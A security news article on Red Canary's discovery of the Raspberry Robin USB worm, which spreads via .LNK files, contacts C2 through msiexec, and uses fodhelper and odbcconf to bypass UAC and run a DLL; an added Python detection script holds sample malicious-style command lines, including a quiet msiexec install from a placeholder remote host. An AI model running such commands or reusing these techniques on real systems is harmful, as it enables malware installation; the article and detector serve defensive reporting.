New Raspberry Robin worm uses Windows Installer to drop malware

Red Canary intelligence analysts have discovered new Windows malware with worming capabilities that spreads using external USB drives.

This malware is related to a cluster of malicious activity called Raspberry Robin and was first observed in September 2021.

Red Canary’s detection engineering team detected the worm in the networks of several customers, some in the technology and manufacturing industries.

Raspberry Robin spreads to new Windows systems when an infected USB drive containing a malicious .LNK file is connected.

Once attached, the worm spawns a new process using cmd.exe to launch a malicious file stored on the infected drive.

Legitimate Windows tools misused to install malware

Raspberry Robin uses the Microsoft Standard Installer (msiexec.exe) to reach its command and control (C2) servers, which are likely hosted on compromised QNAP devices, with Tor exit nodes serving as additional C2 infrastructure.

“While msiexec.exe downloads and executes legitimate installation packages, adversaries also use it to deliver malware,” the researchers said.

“Raspberry Robin uses msiexec.exe to attempt external network communication to a malicious domain for C2 purposes.”

Although they have not yet determined whether it establishes persistence, or by what method, they suspect that the malware installs a malicious DLL file on compromised machines to survive reboots.

Raspberry Robin launches this DLL using two other legitimate Windows utilities: fodhelper (a trusted binary for managing features in Windows Settings) and odbcconf (an ODBC driver configuration tool).

The former allows it to bypass User Account Control (UAC), while the latter will help run and configure the DLL.
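As an added illustration, not taken from the article or from Red Canary's report: a small Python triage routine that flags the process-creation chain described above (cmd.exe launched from a removable drive, msiexec.exe pointed at a remote package, and odbcconf.exe spawned by fodhelper.exe) in constructed sample events. The event field names, the sample command lines, the placeholder domain example.invalid, and the fodhelper.exe to odbcconf.exe parent/child pairing are assumptions.

```python
"""Heuristic process-creation triage for the Raspberry Robin chain described above.
Sample events are constructed, not real telemetry; rule thresholds and the
fodhelper.exe -> odbcconf.exe parent/child pairing are assumptions for illustration."""
import re

# Constructed events modelled on Sysmon Event ID 1 / EDR process-start fields:
# three mirror the chain in the article, two are benign look-alikes.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c start "" "E:\recovery\setup.cmd"'},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /q /i http://example.invalid:8080/package.msi"},  # placeholder domain
    {"parent": r"C:\Windows\System32\fodhelper.exe", "image": r"C:\Windows\System32\odbcconf.exe",
     "cmdline": r"odbcconf -f C:\ProgramData\stage.rsp"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /i C:\Users\alice\Downloads\7zip.msi"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c dir C:\Users\alice"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Heuristic: any drive letter other than the system drive stands in for removable media.
NON_SYSTEM_DRIVE_RE = re.compile(r"\b[D-Zd-z]:\\")

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the rule names the event matches (empty list if it looks benign)."""
    image, parent, cmd = basename(event["image"]), basename(event["parent"]), event["cmdline"]
    hits = []
    # 1. cmd.exe started by the shell to run something from a non-system drive
    if image == "cmd.exe" and parent == "explorer.exe" and NON_SYSTEM_DRIVE_RE.search(cmd):
        hits.append("cmd_launch_from_removable_drive")
    # 2. msiexec.exe told to fetch its package over HTTP(S): the C2 contact path
    if image == "msiexec.exe" and URL_RE.search(cmd):
        hits.append("msiexec_remote_package")
    # 3. odbcconf.exe spawned by fodhelper.exe: UAC bypass chained into DLL execution
    if image == "odbcconf.exe" and parent == "fodhelper.exe":
        hits.append("fodhelper_to_odbcconf")
    return hits

def triage(events):
    """Map each flagged event's command line to its rule hits, dropping clean events."""
    return {e["cmdline"]: classify(e) for e in events if classify(e)}

if __name__ == "__main__":
    for cmdline, rules in triage(SAMPLE_EVENTS).items():
        print(f"{', '.join(rules):35s} {cmdline}")
```

In a real deployment each rule would be tuned against the environment's baseline (software deployment tools also call msiexec with URLs), and a hit on the full chain is far stronger evidence than any single rule.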

[Figure: Raspberry Robin worm infection stream (Red Canary)]

How and why?

Although Red Canary analysts were able to closely inspect what the new discovery does on infected systems, there are still several questions that need to be answered.

“First and foremost, we don’t know how or where Raspberry Robin infects external drives to perpetuate its activity, although it’s likely to happen offline or otherwise outside of our visibility. Nor do we know why Raspberry Robin installs a malicious DLL,” the researchers said.

“One hypothesis is that this may be an attempt to establish persistence on an infected system, although additional information is needed to build confidence in this hypothesis.”

Since there is no information about the malware's final-stage actions, another open question is what the Raspberry Robin operators are ultimately after.

Further technical information on the Raspberry Robin worm, including indicators of compromise (IOCs) and an ATT&CK mapping of this malware, can be found in Red Canary’s report.
